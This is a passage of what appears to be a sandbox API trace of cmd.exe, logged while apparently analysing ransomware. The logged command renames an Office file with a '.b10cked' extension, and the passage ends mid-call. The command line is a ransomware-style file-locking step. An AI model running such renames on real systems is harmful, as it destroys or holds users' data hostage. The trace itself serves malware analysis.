(in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.519] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.519] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0153.519] GetEnvironmentStringsW () returned 0x60210* [0153.519] FreeEnvironmentStringsW (penv=0x60210) returned 1 [0153.519] GetEnvironmentStringsW () returned 0x60210* [0153.519] FreeEnvironmentStringsW (penv=0x60210) returned 1 [0153.519] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee984 | out: phkResult=0x2ee984*=0x40) returned 0x0 [0153.519] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x0, lpData=0x2ee990*=0xa0, lpcbData=0x2ee988*=0x1000) returned 0x2 [0153.519] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x4, lpData=0x2ee990*=0x1, lpcbData=0x2ee988*=0x4) returned 0x0 [0153.519] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x0, lpData=0x2ee990*=0x1, lpcbData=0x2ee988*=0x1000) returned 0x2 [0153.519] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x4, lpData=0x2ee990*=0x0, lpcbData=0x2ee988*=0x4) returned 0x0 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x4, lpData=0x2ee990*=0x40, lpcbData=0x2ee988*=0x4) returned 0x0 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x4, lpData=0x2ee990*=0x40, lpcbData=0x2ee988*=0x4) returned 0x0 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x0, lpData=0x2ee990*=0x40, lpcbData=0x2ee988*=0x1000) returned 0x2 [0153.520] RegCloseKey (hKey=0x40) returned 0x0 [0153.520] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee984 | out: phkResult=0x2ee984*=0x40) returned 0x0 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x0, lpData=0x2ee990*=0x40, lpcbData=0x2ee988*=0x1000) returned 0x2 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x4, lpData=0x2ee990*=0x1, lpcbData=0x2ee988*=0x4) returned 0x0 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x0, lpData=0x2ee990*=0x1, lpcbData=0x2ee988*=0x1000) returned 0x2 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x4, lpData=0x2ee990*=0x0, lpcbData=0x2ee988*=0x4) returned 0x0 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x4, lpData=0x2ee990*=0x9, lpcbData=0x2ee988*=0x4) returned 0x0 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x4, lpData=0x2ee990*=0x9, lpcbData=0x2ee988*=0x4) returned 0x0 [0153.520] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee98c, lpData=0x2ee990, lpcbData=0x2ee988*=0x1000 | out: lpType=0x2ee98c*=0x0, lpData=0x2ee990*=0x9, lpcbData=0x2ee988*=0x1000) returned 0x2 [0153.520] RegCloseKey (hKey=0x40) returned 0x0 [0153.520] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637c [0153.520] srand (_Seed=0x5b88637c) [0153.520] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked\"" [0153.520] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked\"" [0153.520] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.521] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x61970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0153.521] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0153.521] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0153.521] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.521] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0153.521] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0153.521] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0153.521] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0153.521] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0153.521] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0153.521] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0153.521] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0153.521] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0153.521] GetEnvironmentStringsW () returned 0x62360* [0153.522] FreeEnvironmentStringsW (penv=0x62360) returned 1 [0153.522] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.522] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.522] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0153.522] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0153.522] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0153.522] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0153.522] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0153.522] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0153.522] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0153.522] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0153.522] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef750 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.522] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef750, lpFilePart=0x2ef74c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef74c*="Desktop") returned 0x18 [0153.522] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.522] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef4cc | out: lpFindFileData=0x2ef4cc) returned 0x609f0 [0153.522] FindClose (in: hFindFile=0x609f0 | out: hFindFile=0x609f0) returned 1 [0153.522] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef4cc | out: lpFindFileData=0x2ef4cc) returned 0x609f0 [0153.523] FindClose (in: hFindFile=0x609f0 | out: hFindFile=0x609f0) returned 1 [0153.523] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef4cc | out: lpFindFileData=0x2ef4cc) returned 0x609f0 [0153.523] FindClose (in: hFindFile=0x609f0 | out: hFindFile=0x609f0) returned 1 [0153.523] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.523] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0153.523] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0153.523] GetEnvironmentStringsW () returned 0x60210* [0153.523] FreeEnvironmentStringsW (penv=0x60210) returned 1 [0153.523] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.524] GetConsoleOutputCP () returned 0x1b5 [0153.524] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.524] GetUserDefaultLCID () returned 0x409 [0153.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0153.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef890, cchData=128 | out: lpLCData="0") returned 2 [0153.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef890, cchData=128 | out: lpLCData="0") returned 2 [0153.524] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef890, cchData=128 | out: lpLCData="1") returned 2 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0153.525] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0153.525] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0153.526] GetConsoleTitleW (in: lpConsoleTitle=0x50930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.526] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.526] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0153.526] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0153.526] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0153.527] _wcsicmp (_String1="move", _String2=")") returned 68 [0153.527] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0153.527] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0153.527] _wcsicmp (_String1="IF", _String2="move") returned -4 [0153.527] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0153.527] _wcsicmp (_String1="REM", _String2="move") returned 5 [0153.527] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0153.532] GetConsoleTitleW (in: lpConsoleTitle=0x2ef588, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.589] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0153.589] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0153.589] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0153.589] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0153.589] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0153.589] _wcsicmp (_String1="move", _String2="CD") returned 10 [0153.589] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0153.589] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0153.589] _wcsicmp (_String1="move", _String2="REN") returned -5 [0153.589] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0153.589] _wcsicmp (_String1="move", _String2="SET") returned -6 [0153.589] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0153.589] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0153.589] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0153.589] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0153.589] _wcsicmp (_String1="move", _String2="MD") returned 11 [0153.589] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0153.589] _wcsicmp (_String1="move", _String2="RD") returned -5 [0153.589] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0153.589] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0153.589] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0153.589] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0153.589] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0153.589] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0153.589] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0153.589] _wcsicmp (_String1="move", _String2="VER") returned -9 [0153.590] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0153.590] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0153.590] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0153.590] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0153.590] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0153.590] _wcsicmp (_String1="move", _String2="START") returned -6 [0153.590] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0153.590] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0153.590] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0153.591] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.591] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0153.591] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef344, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef33c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef33c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.592] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0153.593] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0153.593] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0153.593] _wcsicmp (_String1="MOR6IN~1.TRX", _String2=".") returned 63 [0153.593] _wcsicmp (_String1="MOR6IN~1.TRX", _String2="..") returned 63 [0153.593] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mor6in~1.trx")) returned 0x2020 [0153.594] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x61f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.594] SetErrorMode (uMode=0x0) returned 0x0 [0153.594] SetErrorMode (uMode=0x1) returned 0x0 [0153.594] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX", nBufferLength=0x104, lpBuffer=0x2eeccc, lpFilePart=0x2eecb4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX", lpFilePart=0x2eecb4*="MOR6IN~1.TRX") returned 0x3c [0153.594] SetErrorMode (uMode=0x0) returned 0x1 [0153.594] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0153.594] _wcsicmp (_String1="MOR6IN~1.TRX", _String2=".") returned 63 [0153.594] _wcsicmp (_String1="MOR6IN~1.TRX", _String2="..") returned 63 [0153.594] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mor6in~1.trx")) returned 0x2020 [0153.594] SetErrorMode (uMode=0x0) returned 0x0 [0153.594] SetErrorMode (uMode=0x1) returned 0x0 [0153.595] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX", nBufferLength=0x104, lpBuffer=0x2ef148, lpFilePart=0x2eeee0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX", lpFilePart=0x2eeee0*="MOR6IN~1.TRX") returned 0x3c [0153.595] SetErrorMode (uMode=0x0) returned 0x1 [0153.595] SetErrorMode (uMode=0x0) returned 0x0 [0153.595] SetErrorMode (uMode=0x1) returned 0x0 [0153.595] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2ef350, lpFilePart=0x2eeee0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked", lpFilePart=0x2eeee0*="MOR6INT.REST.trx_dll.b10cked") returned 0x4c [0153.595] SetErrorMode (uMode=0x0) returned 0x1 [0153.595] SetLastError (dwErrCode=0x0) [0153.595] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mor6int.rest.trx_dll.b10cked")) returned 0xffffffff [0153.595] GetLastError () returned 0x2 [0153.595] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2ee85c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ee85c) returned 0x62130 [0153.595] FindNextFileW (in: hFindFile=0x62130, lpFindFileData=0x2ee85c | out: lpFindFileData=0x2ee85c) returned 0 [0153.596] GetLastError () returned 0x12 [0153.596] FindClose (in: hFindFile=0x62130 | out: hFindFile=0x62130) returned 1 [0153.597] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6IN~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x61cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x61cc0) returned 0x62130 [0153.597] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x2eeaf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0153.597] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x2eeaf4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll", lpFilePart=0x0) returned 0x44 [0153.597] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mor6int.rest.trx_dll")) returned 0x2020 [0153.597] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mor6int.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MOR6INT.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\mor6int.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0153.598] FindClose (in: hFindFile=0x62130 | out: hFindFile=0x62130) returned 1 [0153.598] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2eeaa8 | out: _Buffer=" 1") returned 9 [0153.598] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.598] GetFileType (hFile=0x7) returned 0x2 [0153.598] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0153.598] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2eea34 | out: lpMode=0x2eea34) returned 1 [0153.598] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.598] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2eea68 | out: lpConsoleScreenBufferInfo=0x2eea68) returned 1 [0153.599] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0153.599] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x2eeaa8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0153.599] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2eea8c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x2eea8c*=0x1a) returned 1 [0153.599] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.599] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.599] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.599] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.600] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.600] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.600] SetConsoleInputExeNameW () returned 0x1 [0153.600] GetConsoleOutputCP () returned 0x1b5 [0153.600] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) 